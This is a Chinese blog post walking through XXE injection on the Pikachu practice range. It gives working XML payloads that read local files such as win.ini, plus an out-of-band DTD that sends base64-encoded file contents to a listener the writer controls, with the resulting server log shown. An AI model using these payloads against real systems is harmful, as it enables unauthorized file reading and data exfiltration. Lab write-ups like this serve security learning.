pikachu验证XXE漏洞

已于 2024-03-02 23:24:05 修改
阅读量213 收藏
点赞数 1
文章标签: 服务器 运维
于 2024-03-02 22:07:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyy8910599download/article/details/136422799
版权

先随便输入一个内容查看

服务器有回显

接下来用bp抓包看下参数

有个xml参数,而且Content-Type: application/x-www-form-urlencoded,我们传入url编码后的xml内容试一下

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
	<!ENTITY xxe "你好吗?" >
]>
<foo>&xxe;</foo>

url编码后放入参数xml

接下来试试能不能读取系统文件内容

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
	<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

假如服务器没有回显

我们可以打一个自己的服务器尝试请求

python -m http.server 99

每次访问都会有记录

http://localhost:99/xxe.dtd内容

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini" >
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://localhost:99?c=%file;'>">

POC:

<!DOCTYPE convert [
	<!ENTITY % remote SYSTEM "http://localhost:99/xxe.dtd">
	%remote;%int;%send;
]>

::1 - - [02/Mar/2024 23:18:52] "GET /?c=OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0DQpbZm9udHNdDQpbZXh0ZW5zaW9uc10NClttY2kgZXh0ZW5zaW9uc10NCltmaWxlc10NCltNYWlsXQ0KTUFQST0xDQo= HTTP/1.0" 200 -
参数c的值就是文件内容的base64编码

沧海一粟@星火燎原
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu漏洞练习环境
10-25
"pikachu漏洞练习环境" 是一个专门为网络安全爱好者和专业人士设计的平台,旨在提供一个实践和学习漏洞利用技术的环境。这个环境可以帮助用户提升在网络安全领域的技能,了解常见漏洞的原理,以及如何检测和修复它们...
pikachu-master
05-04
Pikachu漏洞测试平台搭建详解》 在网络安全领域,漏洞测试是确保系统安全的重要环节。Pikachu,一个以小精灵命名的漏洞测试平台,因其易用性和实用性,成为了许多安全研究人员和初学者的首选工具。本文将详细介绍...
pikachu靶场之XXE漏洞详解
lxz021202的博客
03-02 1360
然后观察请求行、Accept、Content-Type,这里可以从Accept中发现能够接收的文档类型包括xml。上图说明目标主机访问了代码中的网址,那就说明目标主机能够解析xml代码,所以可能存在xxe漏洞。然后在Kali中编辑一个文件xxe.dtd(需要在存在这个文件的目录下开启HTTP服务)这段代码是用来读取本机中的123.txt文件,马赛克处是Kali的IP。这是个域名解析网站,在这里用来检验目标主机是否能够解析xml的代码。这个payload会调用Kali中的xxe.dtd文件。
网络安全之XXE漏洞总结(pikachu靶场案例解析)
qq_61529962的博客
12-15 492
xxe漏洞原理解析,php靶场案例,pikachu靶场
XXE 漏洞及案例实战
来日可期的博客
09-24 2411
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XXE漏洞笔记
qq_32812063的博客
11-26 598
XXE
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6579
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
Web安全之XXE漏洞
qq_42751192的博客
08-19 507
XML 指可扩展标记语言(EXtensible Markup Language)。XML 是一种很像 HTML 的标记语言。XML 的设计宗旨是传输数据,而不是显示数据。XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。
XXE漏洞详解与利用
qq_56438857的博客
08-11 7360
XML(Extensible Markup Language)意为可扩展性标记语言,我将介绍下 XML 的一些基础知识,方便你更好地理解漏洞原理。
Pikachu靶场通关笔记--XXE
weixin_45908624的博客
12-27 607
xxe
XXE漏洞复现实操
wutiangui的博客
10-13 885
(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞。如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu-master.zip
06-25
Pikachu靶场,正如其名,以其全面的漏洞练习和丰富的实践环节,成为提升网络安全技能的理想平台。 靶场的核心在于模拟实际漏洞,帮助我们理解和应对各种网络威胁。在这个靶场中,你可以接触到如SQL注入、XSS跨站...
克隆的TrinityCore服务器网速慢卡顿问题的解决(未解决)
skywalk8163的专栏
07-19 1089
这台服务器的问题就是特别卡,网络延时在700ms左右,而且经常出现更大的延时,出现卡顿现象。但是在命令行ping该服务器却很快,用ssh传输文件也很快,所以最终怀疑是不是因为不是本地编译而导致延时大的。关键是局域网的时候,延时也是几百....准备本机编译,看看是否能解决。
Linux:基础命令学习
最新发布
qq_55038440的博客
07-20 915
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
全国产服务器主板:搭载飞腾FT2000+/64处理器的高性能加固服务器
Future_2024的博客
07-18 952
搭载飞腾FT-2000+/64的全国产化服务器主板,拥有丰富的接口,板载独立的显示芯片。100%国产化
Cookies和session区别
qq_39495959的博客
07-19 482
Cookies数据存储在客户端(浏览器)中,而Session数据存储在服务器端。这意味着Cookies是客户端技术,而Session是服务器端技术。
pikachu靶场xxe漏洞
09-07
pikachu靶场的xxe漏洞是指在该靶场中存在的XML外部实体攻击漏洞。通过构造恶意内容,攻击者可以利用这个漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。[1]这个靶场提供了一个接收XML数据的API,用于演示和学习xxe漏洞的原理、利用方法和思路。你可以在GitHub上找到该靶场的地址,并直接解压在www路径下进行使用。 在xxe漏洞的利用过程中,可以通过代码进行文件读取、内网探针或攻击内网应用、远程命令执行(RCE)、无回显读取文件等方式来实现攻击目标。同时也可以通过xxe绕过来绕过一些防御措施。 正常回显XXE是最传统的XXE攻击方式,服务器会直接回显信息,从而完成XXE攻击。而报错XXE是指在利用过程中会触发服务器的错误信息回显,进而获取敏感信息。所以,pikachu靶场的xxe漏洞提供了一个学习和实践的平台,让人们能够更好地了解和防范xxe漏洞的危害。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值